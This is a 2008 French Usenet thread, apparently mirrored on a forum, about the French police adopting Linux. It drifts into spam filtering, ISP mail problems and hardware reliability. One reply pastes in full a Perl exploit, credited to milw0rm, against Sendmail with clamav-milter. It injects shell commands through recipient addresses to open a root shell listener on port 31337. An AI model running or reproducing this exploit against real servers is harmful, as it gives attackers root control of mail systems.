OVH Cloud OVH Cloud

La police francaise passe sous Linux

430 réponses
Avatar
Branlebât
Gageons déjà que la productivité est très faible avec Windows, au vu de
l'imcompétence des piou-piou, ils vont pas être dans la merde avec
Linux

Ca va être un plaisir de les foir faire des FSCK pour rétablir (peut
être) le système de fichiers, ou encore pester contre les documents
imcompatibles entre OpenOffice et Office

Gageons que ces "immenses" économies vont couter plus de 100 fois les
simples système Windows

lol

10 réponses

Avatar
JKB
Le 13-02-2008, à propos de
Re: La police francaise passe sous Linux,
SL écrivait dans fr.comp.os.linux.debats :
Le 13-02-2008, SL a écrit :

C'est complètement marginal ces histoirs de pertes de données ou de
spam. J'ai demandé ce matin à mon père s'il avait jamais perdu le
moindre rapports puisqu'il en a fait, avec équations saisies dans
Word, depuis le milieu des années 80, et bien ça n'a jamais été le
cas.


Heureux homme. C'est l'arbre qui cache la forêt.


C'est toi qui le dit. Je n'ai que des exemples comme ça. Le seul cas de
perte de données avec Word que je connaisse c'est quand un laboratoire
qui rédigeait un dictionnaire (le TLF) a voulu relire 10 ans plus tard
un carton entier de disquettes écrite plusieurs années avant sur
d'autres ordinateurs (des mac). C'était illisible ; ils ont retrouvé
une vieille machine pour convertir et basta. 10 ans, poru l'informatique
domestique, c'est au-delà du temps pris en charge. Les supports de
stockages accessibles aux particuliers ne garantissent même pas cette
distance.


Autre annecdote, mais il faut d'abord s'asseoir : on m'a raconté le cas
d'un administrateur, dans un labo public, qui vérifiait régulièrement
les dates de dernier accès aux fichiers de ses utilisateurs, et qui au
delà d'un seuil supprimait les fichiers sans aucun préavis... paraît
qu'en 10 ans de ce régime personne ne s'est rendu compte de rien...
c'était il y a dix ou quinze ans, cela dit, sur un serveur.


Je te donne un scoop. J'ai même vu un OS faire ça automatiquement.

JKB

--
Le cerveau, c'est un véritable scandale écologique. Il représente 2% de notre
masse corporelle, mais disperse à lui seul 25% de l'énergie que nous
consommons tous les jours.




Avatar
JKB
Le 13-02-2008, à propos de
Re: La police francaise passe sous Linux,
Patrice Karatchentzeff écrivait dans fr.comp.os.linux.debats :
JKB a écrit :

[...]

Non. Statistiquement, l'avion reste encore le moyen le plus sûr de
voyager.


Non. Dans les transports en commun, c'est dans l'ordre : le
téléphérique suivi par l'ascenceur. L'avion vient loin derrière (et je
ne suis même pas sûr qu'il soit à la troisième place).


Comparons ce qui est comparable (en terme de nombre de kilomètres
parcourus).

JKB

--
Le cerveau, c'est un véritable scandale écologique. Il représente 2% de notre
masse corporelle, mais disperse à lui seul 25% de l'énergie que nous
consommons tous les jours.


Avatar
Michel Talon
JKB wrote:


Je vais de donner un scoop. Avec un sendmail des familles configuré
_normalement_, tu lui rajoutes un milter-greylist, un greeting_delay
(dans la conf de sendmail), un mimedefang avec clamav et sa, soit trois ou
quatre lignes de plus dans le /etc/mail/sendmail.mc et tu as un truc
qui commence à bien résister aux spams.


Et qui représente une charge sur la machine énormément plus grande, parceque
les spamassassin et les clamav ce n'est pas gratuit en puissance de calcul.
Quand on est un gros provider avec des centaines de messages arrivant par
seconde, ça commence à poser un petit problème.


Ce genre de configuration
_devrait_ être faite par défaut.


Facile à dire.


On est pour une fois d'accord. Sauf que l'utilisateur veut un truc
qui _marche_. Et le truc qui _marche_ n'est jamais (ou rarement) le
truc le plus simple.


L'utilisateur final n'a en effet aucun problème à ce que ce soit compliqué
pour les autres, pour son provider, etc. mais certainement pas pour lui.



Non. C'est démontré. Je n'ai jamais eu de problème avec des boîtes
sous OS/2 (à l'époque). Très rarement avec MacOS X. Voilà pour le
côté soft. Pour le matériel, c'est un autre problème, mais avec un
_minimum_ de compréhension de l'utilisateur final, on arriverait à
contourner un tas de pannes matérielles. Rappelle-moi combien coûte
un PC actuellement ? Presque rien. Combien coûte un disque dur ?
Rien ou presque. On n'en est plus aux 18000 FF HT où j'ai payé un 5
Mo (oui, Mo) en 1982. Rien, absolument rien ne nous empêche de
coller d'office deux disques en raid1 dans un PC de base pour éviter
les problèmes matériel. Rien ne nous empêche d'utiliser dès la
construction des ventilos corrects (un ventilo correct étant un truc
tournant lentement, sur billes, et pas la petite merde tournant à
7000 trs/mn sur palier lisse qui grippe aux premières poussières) et
des filtres à poussières ! On sait faire. La question est :
"pourquoi ne le fait-on pas ?". Et qu'on ne me dise pas que c'est
une question de prix. Un ventilo correct coûte 4 euros de plus que
le ventilo de base (prix Abix) et un filtre à poussière ne coûte
rien (au pire, on pique les vieux bas de madame et pour peu que ce
ne soient pas des résilles, ça fonctionne très bien).


Et bien pour une fois je suis 100% d'accord avec tout cela. Il faudrait
faire comprendre à l'utilisateur que 2 disques, ça ne doit jamais être
utilisé pour doubler l'espace disque mais pour le mettre en miroir,
que tout ce qui comporte un ventilateur est une cause de bruit puis de panne
et donc qu'il faut bannir les cartes graphiques performantes ventilées comme
des airbus, et les chipsets de course, genre nvidia sur lesquels on pourrait
faire cuire un oeuf. Clairement les revues informatiques rendent un très
mauvais service en privilégiant constamment les performances et des
benchmarks débiles alors que l'intérêt réel de l'utilisateur est exactement
à l'opposé.


JKB



--
Michel Talon

Avatar
JKB
Le 13-02-2008, à propos de
Re: La police francaise passe sous Linux,
Thierry B. écrivait dans fr.comp.os.linux.debats :
--{ SL a plopé ceci: }--

Et on se retrouve avec 97% de spam. Trop merci l'informatique
domestique ouverte aux quatre vents pour cause de manque de
formation...


On en revient toujours au même truc... les spam, la formation, la
"fausse facilité", la vente liée... : des épiphénomènes monté en
épingle... Le spam c'est irritant pour les usagers mais je crois pas
qu'ils soient prêt à augmenter la technicité de l'informatique
domestique qui est le prix à payer (au moins) pour ne plus en avoir.


Sauf quand leur fournisseur d'accès ne pourra plus assurer une
distribution correcte du courrier. Et c'est ce qui est en train
de se passer: chez Free, par exemple, il en sont aux blacklistages
massif et autres joyausetées.


Chez Free, ce n'est même plus de l'ordre du blacklistage massif (on
en est à devoir limiter le nombre de connexions par heures sur leurs
SMTP pour pouvoir leur envoyer des mails...). Le Neuf, c'est encore
plus sympa. Comme leur unique MX n'arrivait plus à suivre (fallait
voir les messages DSN, c'était surprenant...), ils ont installé un
MX2 qui renvoyait un superbe "no route to host" durant quelques
semaines. Pratique pour recevoir du courrier. J'ai dû coller
l'adresse renvoyé par la résolution de nom dans les /etc/hosts
locaux de mes serveurs pour faire pointer le MX2 de neuf sur le MX !
Tu parles d'un travail. Quant à Club-Internet, leur SMTP ne suit
_aucune_ des RFC de base... En particulier, pour CI, il faut que le
mail passe au premier envoie et avec moins d'une seconde entre la
connexion initiale et le greeting sous peine de se prendre un 500
chez CI...

Bref le spam c'est surtout un scandale d'un point de vue de spécialiste.
Pour les usagers c'est seulement une nuisance.


Pas quand leurs précieux mails avec la photo du petit sur les genoux
de la mémé passent à la trappe, ou mettent plus de deux minutes pour
arriver. Là, ils commencent à réaliser qu'il y a un problème.


tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.

JKB

--
Le cerveau, c'est un véritable scandale écologique. Il représente 2% de notre
masse corporelle, mais disperse à lui seul 25% de l'énergie que nous
consommons tous les jours.



Avatar
JKB
Le 13-02-2008, à propos de
Re: La police francaise passe sous Linux,
Michel Talon écrivait dans fr.comp.os.linux.debats :
JKB wrote:


Je vais de donner un scoop. Avec un sendmail des familles configuré
_normalement_, tu lui rajoutes un milter-greylist, un greeting_delay
(dans la conf de sendmail), un mimedefang avec clamav et sa, soit trois ou
quatre lignes de plus dans le /etc/mail/sendmail.mc et tu as un truc
qui commence à bien résister aux spams.


Et qui représente une charge sur la machine énormément plus grande, parceque
les spamassassin et les clamav ce n'est pas gratuit en puissance de calcul.
Quand on est un gros provider avec des centaines de messages arrivant par
seconde, ça commence à poser un petit problème.


Si tu avais lu attentivement ce que j'écrivais, il y a deux choses
_avant_ l'étape SA+clamav, ce qui fait que seuls passent dans
mimedefang les mails provenant de serveurs respectant les RFC et à
destination de comptes _existant_. La surcharge est donc faible par
rapport au mimedefang brut de fonderie sur toutes les connexions.
Bref, avec une telle configuration, j'ai un serveur U80 (4 procs à
450 MHz) qui tient quatre-vingt mille mails entrants dans la journée
(taille moyenne 80 Ko) sans broncher.

Maintenant, lorsqu'on est un gros provider, on a l'infrastructure
qui doit suivre, c'est évident, mais l'augmentation de puissance
nécessaire n'est pas si importante que cela (d'autant que la plupart
des FAI proposent déjà des trucs abscons à coup de regex et autres
joyeusetés qui bouffent déjà de la puissance de calcul).

Ce genre de configuration
_devrait_ être faite par défaut.


Facile à dire.


Pourquoi ?

On est pour une fois d'accord. Sauf que l'utilisateur veut un truc
qui _marche_. Et le truc qui _marche_ n'est jamais (ou rarement) le
truc le plus simple.


L'utilisateur final n'a en effet aucun problème à ce que ce soit compliqué
pour les autres, pour son provider, etc. mais certainement pas pour lui.



Non. C'est démontré. Je n'ai jamais eu de problème avec des boîtes
sous OS/2 (à l'époque). Très rarement avec MacOS X. Voilà pour le
côté soft. Pour le matériel, c'est un autre problème, mais avec un
_minimum_ de compréhension de l'utilisateur final, on arriverait à
contourner un tas de pannes matérielles. Rappelle-moi combien coûte
un PC actuellement ? Presque rien. Combien coûte un disque dur ?
Rien ou presque. On n'en est plus aux 18000 FF HT où j'ai payé un 5
Mo (oui, Mo) en 1982. Rien, absolument rien ne nous empêche de
coller d'office deux disques en raid1 dans un PC de base pour éviter
les problèmes matériel. Rien ne nous empêche d'utiliser dès la
construction des ventilos corrects (un ventilo correct étant un truc
tournant lentement, sur billes, et pas la petite merde tournant à
7000 trs/mn sur palier lisse qui grippe aux premières poussières) et
des filtres à poussières ! On sait faire. La question est :
"pourquoi ne le fait-on pas ?". Et qu'on ne me dise pas que c'est
une question de prix. Un ventilo correct coûte 4 euros de plus que
le ventilo de base (prix Abix) et un filtre à poussière ne coûte
rien (au pire, on pique les vieux bas de madame et pour peu que ce
ne soient pas des résilles, ça fonctionne très bien).


Et bien pour une fois je suis 100% d'accord avec tout cela. Il faudrait
faire comprendre à l'utilisateur que 2 disques, ça ne doit jamais être
utilisé pour doubler l'espace disque mais pour le mettre en miroir,
que tout ce qui comporte un ventilateur est une cause de bruit puis de panne
et donc qu'il faut bannir les cartes graphiques performantes ventilées comme
des airbus, et les chipsets de course, genre nvidia sur lesquels on pourrait
faire cuire un oeuf. Clairement les revues informatiques rendent un très
mauvais service en privilégiant constamment les performances et des
benchmarks débiles alors que l'intérêt réel de l'utilisateur est exactement
à l'opposé.


Ce jour est à marquer d'une pierre blanche ;-)

JKB

--
Le cerveau, c'est un véritable scandale écologique. Il représente 2% de notre
masse corporelle, mais disperse à lui seul 25% de l'énergie que nous
consommons tous les jours.


Avatar
Professeur M

Non. Dans les transports en commun, c'est dans l'ordre : le
téléphérique suivi par l'ascenceur. L'avion vient loin derrière (et je
ne suis même pas sûr qu'il soit à la troisième place).


Comparons ce qui est comparable (en terme de nombre de kilomètres
parcourus).


Par contre, dans ce classement, le lit d'hôpital est très mal placé

--
C'est parce que la lumière est plus rapide que le son que certains
ont l'air brillants avant d'avoir l'air con


Avatar
Kevin Denis
On 2008-02-13, JKB wrote:
Je vais de donner un scoop. Avec un sendmail des familles configuré
_normalement_, tu lui rajoutes un milter-greylist, un greeting_delay
(dans la conf de sendmail), un mimedefang avec clamav et sa, soit
trois ou
quatre lignes de plus dans le /etc/mail/sendmail.mc et tu as un truc
qui commence à bien résister aux spams.


Pour résister à se faire rooter, c'est autre chose.
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploitn";
print "Copyright (C) 2007 Eliteboyn";

if ($#ARGV != 0) {print "Give me a host to connect.n";exit;}

print "Attacking $ARGV[0]...n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');

print $sock "ehlo yourn";
print $sock "mail from: <>rn";
print $sock "rcpt to: <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost>rn";
print $sock "rcpt to: <nobody+"|/etc/init.d/inetd restart"@localhost>rn";
print $sock "datarn.rnquitrn";

while (<$sock>) {
print;
}

# milw0rm.com [2007-12-21]

--
Kevin

Avatar
Thierry B.
--{ Michel Billaud a plopé ceci: }--

Si, c'est sûrement ça, et je n'arrive pas à me rappeler où j'avais
lu il y a longtemps un article prémonitoire là-dessus. Genre une
rubrique de Pournelle...


Qui devait se référer à Brooks, celui du mythical man-month

http://www.the-wabe.com/notebook/second-system.html


Fort probablement. Il existe en version française, ce monument ?

--
Une eau-de-feu sans faux-col.
J'ai un cubit de whisky corse dans le coffre de mon Kangoo.

J'ai vomi :-( (véridique)

--{ DG, dans fr.misc.divers }--


Avatar
Thierry B.
--{ JKB a plopé ceci: }--

tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.
tTh, le mail est acheminé par un protocole asynchrone.

Tu ne vas pas répéter ça pendant cinq jours, quand même ?


--
http://la.buvette.org/POV/ex/zoom.html

Avatar
Samuel Colin
Dixit Professeur Méphisto :

le téléphérique suivi par l'ascenceur. L'avion vient loin derrière
Comparons ce qui est comparable (en terme de nombre de kilomètres parcourus).

Par contre, dans ce classement, le lit d'hôpital est très mal placé



J'me suis dit que ce reformatage intéresserait des gens.